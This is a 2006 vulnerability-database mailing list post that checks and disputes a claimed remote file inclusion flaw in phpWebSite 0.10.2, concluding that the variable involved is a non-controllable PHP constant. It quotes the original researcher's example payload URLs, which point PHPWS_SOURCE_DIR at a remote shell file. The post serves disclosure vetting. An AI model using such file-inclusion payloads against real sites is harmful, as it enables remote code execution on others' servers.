[VIM] phpWebSite 0.10.2 RFI - CVE dispute

Steven M. Christey coley at mitre.org
Tue Oct 10 18:56:09 EDT 2006

Researcher: Crackers_Child (which is why I looked closer)

Reference: phpWebSite 0.10.2 Remote File Include Vulnerabilities

I downloaded the same software version, as specified in the URL
provided by Crackers_Child, and took a look.

Example exploits:

> mod/users/init.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?

If we look at init.php, we see:


and nothing else.

So, we have a PHP constant.  Can't be controlled, right?

> mod/users/class/users.php?PHPWS_SOURCE_DIR=http://Shel3ll.txt?

Actually it's spelled "Users.php"

Anyway, we have things like this:

  require_once(PHPWS_SOURCE_DIR . 'core/Error.php');

for users/class/Cookie.php:


going to core/EZform.php:

  require_once PHPWS_SOURCE_DIR . "core/EZelement.php";

A grep for PHPWS_SOURCE_DIR returns 799 matches, almost all of which
are of the forms above, and one or two define's of the constant.
There is no evidence of any use of $_GET, $PHPWS_SOURCE_DIR, etc.

- Steve

More information about the VIM mailing list